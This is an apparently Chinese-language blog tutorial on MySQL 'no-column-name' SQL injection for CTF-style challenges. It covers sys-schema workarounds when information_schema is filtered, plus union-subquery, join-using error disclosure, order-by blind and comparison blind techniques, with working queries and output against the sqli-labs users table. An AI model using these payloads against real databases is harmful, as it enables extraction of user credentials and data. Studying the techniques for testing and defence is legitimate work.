<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    

<script>!function(){var e=window.matchMedia&&window.matchMedia("(prefers-color-scheme: dark)").matches,t=localStorage.getItem("use-color-scheme")||"auto";("dark"===t||e&&"light"!==t)&&document.documentElement.classList.toggle("dark",!0)}()</script>

<meta charset="utf-8" >

<title>无列名注入</title>
<meta name="keywords" content="无列名注入, killeveee">
<meta name="description" content="一道题引发的无列名注入 | ChaBug安全
聊一聊bypass information_schema-安全客 - 安全资讯平台 (anquanke.com)
information_schemainformation_schema这个库保">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/style/main.css">


<link rel="stylesheet" href="/style/jquery.fancybox.min.css">




    <link rel="stylesheet" href="/style/prism.css"/>




  <meta name="generator" content="Hexo 6.1.0"></head>
  <body>
    <div id="app" class="main">

<div class="site-header-container">
  <div class="site-header">
    <div class="left">
      <a href="https://killeveee.github.io/archives">
        <img class="avatar" src="/images/avatar.png" alt="logo" width="32px" height="32px">
      </a>
      <a href="https://killeveee.github.io/archives">
        <h1 class="site-title">killeveee</h1>
      </a>
    </div>
    <div class="right">
        <i class="icon menu-switch icon-menu-outline" ></i>
    </div>
  </div>
</div>

<div class="menu-container" style="height: 0;opacity: 0;">
<nav class="menu-list">
  
    
      <a href="/archives" class="menu purple-link">
        Index
      </a>
    
  
    
      <a href="/tags" class="menu purple-link">
        Tags
      </a>
    
  
    
      <a href="/about" class="menu purple-link">
        About
      </a>
    
  
</nav>
</div>



  <div class="content-container">
    <div class="post-detail">
      
      <h2 class="post-title">无列名注入</h2>
      <div class="post-info post-detail-info">
        <span><i class="icon icon-calendar-outline"></i> 2022-12-19</span>
        
          <span>
          <i class="icon icon-pricetags-outline"></i>
            
              <a href="/tags/web%E5%AE%89%E5%85%A8/">
              web安全
                
              </a>
            
          </span>
        
      </div>
      <div class="post-content-wrapper">
        <div class="post-content">
          <p><a target="_blank" rel="noopener" href="https://www.chabug.org/ctf/852">一道题引发的无列名注入 | ChaBug安全</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/193512#h3-4">聊一聊bypass information_schema-安全客 - 安全资讯平台 (anquanke.com)</a></p>
<h1 id="information-schema"><a href="#information-schema" class="headerlink" title="information_schema"></a>information_schema</h1><p>information_schema这个库保存着mysql服务器的数据库的信息，包括了</p>
<ul>
<li>数据库名（information_schema.schemata）【schema_name】</li>
<li>表名（information_schema.tables）【table_schema，table_name】</li>
<li>字段名（information_schema.columns）【column_name】</li>
</ul>
<blockquote>
<p>另外MySQL还有一个自带的performance schema库，用于监控MySQL server在一个较低级别的运行过程中的资源消耗、资源等待等情况 。</p>
</blockquote>
<h2 id="InnoDb"><a href="#InnoDb" class="headerlink" title="InnoDb"></a>InnoDb</h2><p>从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了<code>innodb_index_stats</code>和<code>innodb_table_stats</code>两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。但是mysql是<strong>默认关闭</strong>InnoDB存储引擎的。</p>
<h2 id="sys"><a href="#sys" class="headerlink" title="sys"></a>sys</h2><p>mysql在5.7版本中新增了sys schema，基础数据来自于performance_schema和information_schema两个库，本身数据库不存储数据。</p>
<p>当ctf题目过滤了information_schema的时候，我们可以使用<code>sys.schema_auto_increment_columns</code>来获取表名。但是<code>sys.schema_auto_increment_columns</code> 只能获取到有<u>自增</u>主键的表的数据。</p>
<p>那如果想通过注入获取到没有自增主键的表的数据怎么办？</p>
<p>sys库里这两个表可以用：</p>
<ol>
<li><code>sys.schema_table_statistics_with_buffer</code></li>
<li><code>sys.x$schema_table_statistics_with_buffer</code></li>
</ol>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema&#x3D;database()

select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema&#x3D;database()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>上面的方法的确可以获取数据库中表名信息了，但是并没有找到类似于information_schema中COLUMNS的视图，也就是说我们并不能获取数据。因此引出了无列名注入。</p>
<h1 id="无列名注入"><a href="#无列名注入" class="headerlink" title="无列名注入"></a>无列名注入</h1><h2 id="子查询"><a href="#子查询" class="headerlink" title="子查询"></a>子查询</h2><p>无列名注入之子查询的原理是依靠union select时产生的<strong>虚拟表</strong>来查询数据，<em>不需要知道列名</em>。</p>
<p>以sqli的security表为例：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">#查看所有字段
mysql&gt; select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)
&#x2F;*先select 1,2,3，可以让1,2,3位于第一行，充当列名，更好控制.
union select * from users联合查询所有数据段。
*&#x2F;
mysql&gt; select 1,2,3 union select * from users;
+----+----------+------------+
| 1  | 2        | 3          |
+----+----------+------------+
|  1 | 2        | 3          |
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
14 rows in set (0.00 sec)
&#x2F;*(select 1,2,3 union select * from users)n表示把select 1,2,3 union select * from users的结果当成一个表，后面的n是别名，相当于as n
select &#96;2&#96; 查询我们构造的虚拟表的2这个列，这里就体现了控制列名的好处。
#注意这里如果没有&#96;&#96;会报错。
*&#x2F;
mysql&gt; select &#96;2&#96; from (select 1,2,3 union select * from users)n;
+----------+
| 2        |
+----------+
| 2        |
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
| admin1   |
| admin2   |
| admin3   |
| dhakkan  |
| admin4   |
+----------+
14 rows in set (0.00 sec)
&#x2F;*
如果把&#96;&#96;给过滤了的话，我们可以给2取个别名，从而绕过。
像下面这样，就不使用到&#96;&#96;
*&#x2F;
mysql&gt; select a from (select 1,2 as a,3 union select * from users)n;
+----------+
| a        |
+----------+
| 2        |
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
| admin1   |
| admin2   |
| admin3   |
| dhakkan  |
| admin4   |
+----------+
14 rows in set (0.00 sec)
#或者像下面使用【表名.列名】这样绕过&#96;&#96;
mysql&gt; select n.2 from (select 1,2,3 union select * from users)n;
+----------+
| 2        |
+----------+
| 2        |
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
| admin1   |
| admin2   |
| admin3   |
| dhakkan  |
| admin4   |
+----------+
14 rows in set (0.00 sec)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="join…using"><a href="#join…using" class="headerlink" title="join…using"></a>join…using</h2><pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users where id&#x3D;&#39;0&#39; union all select * from (select * from users as a join users as b)as c;
ERROR 1060 (42S21): Duplicate column name &#39;id&#39;
mysql&gt; select * from users where id&#x3D;&#39;0&#39; union all select * from (select * from users as a join users as b using(id))as c;
ERROR 1060 (42S21): Duplicate column name &#39;username&#39;
mysql&gt; select * from users where id&#x3D;&#39;0&#39; union all select * from (select * from users as a join users as b using(id,username))as c;
ERROR 1060 (42S21): Duplicate column name &#39;password&#39;
mysql&gt; select * from users where id&#x3D;&#39;0&#39; union all select * from (select * from users as a join users as b using(id,username,password))as c;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>注意看报错信息，直接得到了列名。</p>
<p>原理：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users as a join users as b;
+----+----------+------------+----+----------+------------+
| id | username | password   | id | username | password   |
+----+----------+------------+----+----------+------------+
|  1 | Dumb     | Dumb       |  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |  1 | Dumb     | Dumb       |
|  4 | secure   | crappy     |  1 | Dumb     | Dumb       |
以下省略.....<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>发现这条语句的作用是构造了一个含有两个一模一样users表的虚拟表。</p>
<p>然后我们用这个表随便select一查：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from (select * from users as a join users as b)as c;
ERROR 1060 (42S21): Duplicate column name &#39;id&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>就报错了！</p>
<blockquote>
<p><strong>这是因为一个表中不允许出现两个相同的列名。</strong></p>
</blockquote>
<p>我们再看using的使用，using等价于join操作中的on（约束）：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users as a join users as b using(id);
+----+----------+------------+----------+------------+
| id | username | password   | username | password   |
+----+----------+------------+----------+------------+
|  1 | Dumb     | Dumb       | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you | Angelina | I-kill-you |<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>发现后面加了using(id)后，虚拟表中就只有一个id列了！</p>
<p>那么这样一来id就不会报错，按顺序就是username报错了。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from (select * from users as a join users as b using(id))as c;
ERROR 1060 (42S21): Duplicate column name &#39;username&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>确实如此！</p>
<h2 id="order-by盲注"><a href="#order-by盲注" class="headerlink" title="order by盲注"></a>order by盲注</h2><p>order by <u>默认升序</u>排序。根据构造的字符与原字段的排序位置的变化来判断字符，跟二分查找类似。</p>
<p>猜第一位</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;c&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | c        |
|  1 | Dumb     | Dumb     |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;d&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | d        |
|  1 | Dumb     | Dumb     |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;e&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
|  1 | 2        | e        |
+----+----------+----------+
2 rows in set (0.00 sec)
#说明第一位是d<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>猜第二位</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;dt&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | dt       |
|  1 | Dumb     | Dumb     |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;du&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | du       |
|  1 | Dumb     | Dumb     |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql&gt; select * from users where id&#x3D;1 union select 1,2,&#39;dv&#39; order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
|  1 | 2        | dv       |
+----+----------+----------+
2 rows in set (0.00 sec)
#说明第二位是u<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="比大小盲注"><a href="#比大小盲注" class="headerlink" title="比大小盲注"></a>比大小盲注</h2><p>跟order by盲注类似</p>
<p><code>select (select 1,&#39;b&#39;,3) &gt; (select * from users limit 0,1);</code></p>
<p>通过返回的1或者0，来判断。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select * from users limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql&gt; select 1,&#39;b&#39;,3;
+---+---+---+
| 1 | b | 3 |
+---+---+---+
| 1 | b | 3 |
+---+---+---+
1 row in set (0.00 sec<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">mysql&gt; select (select 1,&#39;b&#39;,3) &gt; (select * from users limit 0,1);
+----------------------------------------------------+
| (select 1,&#39;b&#39;,3) &gt; (select * from users limit 0,1) |
+----------------------------------------------------+
|                                                  0 |
+----------------------------------------------------+
1 row in set (0.00 sec)

mysql&gt; select (select 1,&#39;d&#39;,3) &gt; (select * from users limit 0,1);
+----------------------------------------------------+
| (select 1,&#39;d&#39;,3) &gt; (select * from users limit 0,1) |
+----------------------------------------------------+
|                                                  0 |
+----------------------------------------------------+
1 row in set (0.00 sec)

mysql&gt; select (select 1,&#39;e&#39;,3) &gt; (select * from users limit 0,1);
+----------------------------------------------------+
| (select 1,&#39;e&#39;,3) &gt; (select * from users limit 0,1) |
+----------------------------------------------------+
|                                                  1 |
+----------------------------------------------------+<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


        </div>
        <div class="top-div">
          <ol class="top-box"><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#information-schema"><span class="top-box-text">information_schema</span></a><ol class="top-box-child"><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#InnoDb"><span class="top-box-text">InnoDb</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#sys"><span class="top-box-text">sys</span></a></li></ol></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5"><span class="top-box-text">无列名注入</span></a><ol class="top-box-child"><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#%E5%AD%90%E6%9F%A5%E8%AF%A2"><span class="top-box-text">子查询</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#join%E2%80%A6using"><span class="top-box-text">join…using</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#order-by%E7%9B%B2%E6%B3%A8"><span class="top-box-text">order by盲注</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#%E6%AF%94%E5%A4%A7%E5%B0%8F%E7%9B%B2%E6%B3%A8"><span class="top-box-text">比大小盲注</span></a></li></ol></li></ol>
        </div>
      </div>
    </div>

    
      <div class="next-post">
        <a class="purple-link" href="/2022/12/12/HTTP%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/">
          <h3 class="post-title">
            下一篇：HTTP请求走私
          </h3>
        </a>
      </div>
    
  </div>




<footer>
<div class="site-footer">
  <div class="social-container">
    
      
        <a href="https://github.com/" target="_blank">
          <i class="icon icon-github"></i>
        </a>
      
    
      
        <a href="https://twitter.com/" target="_blank">
          <i class="icon icon-twitter"></i>
        </a>
      
    
      
    
      
    
      
    
  </div>
  
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> <a href="https://github.com/f-dong/hexo-theme-minimalism" target="_blank">Theme</a>
  
  
  
  
  
  
</div>
</footer>


      </div>
      
    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.fancybox.min.js"></script>


<script id="hexo-configurations">
    window.theme_config = {"image":{"lazyload_enable":false}};
    window.is_post = true;
  </script>

<script src="/js/main.js"></script>





    </div>
  </body>
</html>

